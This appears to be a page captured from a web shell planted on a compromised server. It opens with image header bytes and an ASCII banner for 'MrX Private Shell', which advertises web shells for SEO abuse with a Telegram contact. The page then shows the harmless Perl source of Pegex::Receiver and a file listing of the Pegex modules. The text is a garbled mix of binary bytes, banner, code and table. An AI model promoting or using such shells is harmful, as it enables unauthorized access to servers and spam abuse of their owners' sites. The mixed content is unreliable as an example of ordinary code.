����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
package Pegex::Receiver;
use Pegex::Base;
has parser => (); # The parser object.
sub rule { $_[0]->{parser}{rule} }
# Flatten a structure of nested arrays into a single array in place.
sub flatten {
my ($self, $array, $times) = @_;
$times = -1
unless defined $times;
while ($times-- and grep {ref($_) eq 'ARRAY'} @$array) {
@$array = map {
(ref($_) eq 'ARRAY') ? @$_ : $_
} @$array;
}
return $array;
}
1;
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Base.pm | File | 2.26 KB | 0644 |
|
| Bootstrap.pm | File | 13.7 KB | 0644 |
|
| Compiler.pm | File | 4.68 KB | 0644 |
|
| Grammar.pm | File | 3.25 KB | 0644 |
|
| Input.pm | File | 1.53 KB | 0644 |
|
| Optimizer.pm | File | 3.81 KB | 0644 |
|
| Parser.pm | File | 7.67 KB | 0644 |
|
| Receiver.pm | File | 465 B | 0644 |
|
| Tree.pm | File | 311 B | 0644 |
|